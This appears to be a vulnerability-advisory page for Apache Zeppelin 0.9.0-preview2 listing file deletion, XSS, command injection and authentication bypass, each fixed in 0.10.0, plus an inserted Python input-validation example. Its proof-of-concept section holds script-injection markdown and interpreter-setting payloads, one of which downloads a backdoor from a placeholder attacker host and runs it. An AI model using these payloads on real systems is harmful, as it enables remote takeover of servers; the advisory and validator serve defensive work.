org.apache.zeppelin:zeppelin@0.9.0-preview2 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the org.apache.zeppelin:zeppelin package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability / Vulnerable version

Severity: M (medium)
Improper Input Validation

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Improper Input Validation in the Move folder to Trash feature, allowing an attacker to delete arbitrary files.

How to fix Improper Input Validation?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

Vulnerable versions: [,0.10.0)

Severity: M (medium)
Cross-site Scripting (XSS)

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the markdown interpreter of Apache Zeppelin, which allows an attacker to inject malicious scripts.

PoC

%md
foo
<script>alert(String.fromCharCode(88,83,83))</script>
bar
<bold onclick='alert("a");'>qqq</bold>

How to fix Cross-site Scripting (XSS)?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

Vulnerable versions: [,0.10.0)

Severity: M (medium)
Command Injection

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Command Injection. A bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands through the Spark interpreter settings, whose values are passed unescaped to a shell command line.

PoC

# Insert into Spark interpreter settings
# This example will also crash Spark jobs because command line is truncated
spark.executor.memory=16g;touch${IFS%?}/tmp/test

# Another example; in this case Spark jobs are executed normally without interruption
spark.driver.cores=2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}`

How to fix Command Injection?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

Vulnerable versions: [,0.10.0)

Severity: M (medium)
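A defensive check for this class of bug, added here as an illustration and not part of the Snyk advisory or of Zeppelin's own fix: interpreter property keys and values are validated against a strict allowlist before they reach a command line, and the spark-submit command is built as an argv list so no shell ever parses the values. The allowlist patterns, the helper names and the sample settings are assumptions constructed for this example.

```python
import re
from typing import Dict, List, Optional

# Assumed allowlist policy: keys look like spark.executor.memory, values are
# plain tokens (16g, 2, a path, a URL) with no shell metacharacters such as
# ; ` $ { } | & < > ( ) or whitespace. Tighten to your deployment's needs.
KEY_RE = re.compile(r"^[A-Za-z0-9_.-]+$")
VALUE_RE = re.compile(r"^[A-Za-z0-9_.:/,=+-]*$")
ALLOWED_VALUE_CHARS = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_.:/,=+-"
)

# Constructed sample: the first PoC value from the advisory above, a short
# backtick variant, and two benign settings.
SAMPLE_SETTINGS: Dict[str, str] = {
    "spark.executor.memory": "16g;touch${IFS%?}/tmp/test",
    "spark.driver.cores": "2`id`",
    "spark.executor.cores": "2",
    "spark.app.name": "zeppelin-notebook",
}


def validate_setting(key: str, value: str) -> Optional[str]:
    """Return None if the pair is acceptable, otherwise a rejection reason."""
    if not KEY_RE.match(key):
        return f"key {key!r} contains characters outside [A-Za-z0-9_.-]"
    if not VALUE_RE.match(value):
        bad = sorted(set(value) - ALLOWED_VALUE_CHARS)
        return f"value for {key!r} contains disallowed characters: {bad}"
    return None


def rejected_settings(settings: Dict[str, str]) -> Dict[str, str]:
    """Map each rejected key to its reason; empty dict means all passed."""
    results = {k: validate_setting(k, v) for k, v in settings.items()}
    return {k: r for k, r in results.items() if r is not None}


def build_spark_submit_argv(settings: Dict[str, str]) -> List[str]:
    """Validate every setting and build an argv list for subprocess.run(argv)
    with shell=False; a single rejected value aborts the whole command."""
    argv = ["spark-submit"]
    for key, value in settings.items():
        reason = validate_setting(key, value)
        if reason is not None:
            raise ValueError(reason)
        argv += ["--conf", f"{key}={value}"]
    return argv


if __name__ == "__main__":
    for key, reason in rejected_settings(SAMPLE_SETTINGS).items():
        print(f"REJECT {key}: {reason}")
```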
Access Restriction Bypass

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Access Restriction Bypass. An authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin's authentication mechanism and act as another user.

How to fix Access Restriction Bypass?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

Vulnerable versions: [,0.10.0)